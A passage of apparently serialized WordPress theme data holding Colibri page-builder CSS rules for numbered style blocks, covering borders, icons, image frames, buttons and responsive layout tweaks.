border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-780-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:781;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-781-image {\n opacity: 1;\n}\n#colibri .style-781-caption {\n margin-top: 10px;\n}\n#colibri .style-781-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:782;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-782 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:783;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-783 ul {\n list-style-type: disc;\n}\n#colibri .style-783 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:785;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-785-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-785-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:786;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-786-image {\n opacity: 1;\n}\n#colibri .style-786-caption {\n margin-top: 10px;\n}\n#colibri .style-786-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:787;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-787 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:788;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-788 ul {\n list-style-type: disc;\n}\n#colibri .style-788 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:791;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-791-image {\n opacity: 1;\n}\n#colibri .style-791-caption {\n margin-top: 10px;\n}\n#colibri .style-791-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:792;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-792 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:793;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-793 ul {\n list-style-type: disc;\n}\n#colibri .style-793 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:795;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-795-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-795-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:796;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-796 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:797;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-797 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:798;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-798-image {\n opacity: 1;\n}\n#colibri .style-798-caption {\n margin-top: 10px;\n}\n#colibri .style-798-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:799;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-799 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:800;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-800 ul {\n list-style-type: disc;\n}\n#colibri .style-800 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:802;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-802-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-802-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:803;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-803-image {\n opacity: 1;\n}\n#colibri .style-803-caption {\n margin-top: 10px;\n}\n#colibri .style-803-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:804;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-804 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:805;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-805 ul {\n list-style-type: disc;\n}\n#colibri .style-805 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:807;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-807-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-807-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:808;a:3:{s:7:\"desktop\";s:650:\".style-808 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-808 {\n text-align: center;\n height: auto;\n min-height: unset;\n box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n background-color: #f6f8fa;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:828;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-828 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:829;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:830;a:3:{s:7:\"desktop\";s:159:\".style-830 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-830 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:831;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-831-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-831-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-831-caption {\n margin-top: 10px;\n}\n#colibri .style-831-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:832;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-832 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:833;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-833 {\n font-style: italic;\n}\n#colibri .style-833 p {\n font-style: italic;\n}\n#colibri .style-833 ul {\n list-style-type: disc;\n}\n#colibri .style-833 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:835;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-835 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-835 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-835 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-835 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:842;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:843;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-843 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:844;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-844 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:846;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-846 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:847;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:848;a:3:{s:7:\"desktop\";s:159:\".style-848 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-848 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:849;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-849-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-849-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-849-caption {\n margin-top: 10px;\n}\n#colibri .style-849-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:850;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-850 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:851;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-851 {\n font-style: italic;\n}\n#colibri .style-851 p {\n font-style: italic;\n}\n#colibri .style-851 ul {\n list-style-type: disc;\n}\n#colibri .style-851 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:852;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-852 ul {\n list-style-type: disc;\n}\n#colibri .style-852 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:853;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-853 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-853 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-853 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-853 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:854;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-854-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-854-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-854-caption {\n margin-top: 10px;\n}\n#colibri .style-854-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:855;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-855 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-855 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-855 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-855 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:856;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-856-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-856-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-856-caption {\n margin-top: 10px;\n}\n#colibri .style-856-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:857;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-857 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-857 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-857 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-857 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:858;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-858-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-858-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-858-caption {\n margin-top: 10px;\n}\n#colibri .style-858-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:859;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-859 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-859 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-859 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-859 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:860;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:861;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-861 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:862;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-862 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:863;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-863 ul {\n list-style-type: disc;\n}\n#colibri .style-863 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:864;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:865;a:3:{s:7:\"desktop\";s:1284:\"#colibri .style-865-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-865 {\n text-align: center;\n background-color: #303e7a;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #fff;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n}\n#colibri .style-865:hover,#colibri .style-865:focus {\n background-color: rgb(7, 29, 122);\n border-top-color: rgb(7, 29, 122);\n border-right-color: rgb(7, 29, 122);\n border-bottom-color: rgb(7, 29, 122);\n border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-865:active .style-865-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:866;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-866 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:867;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-867 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:868;a:3:{s:7:\"desktop\";s:857:\"#colibri .style-868 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: contain;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n z-index: 1;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-868 {\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-868 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(5%);\n}\n\";}i:869;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-869 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-869 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-869 {\n text-align: center;\n padding-top: 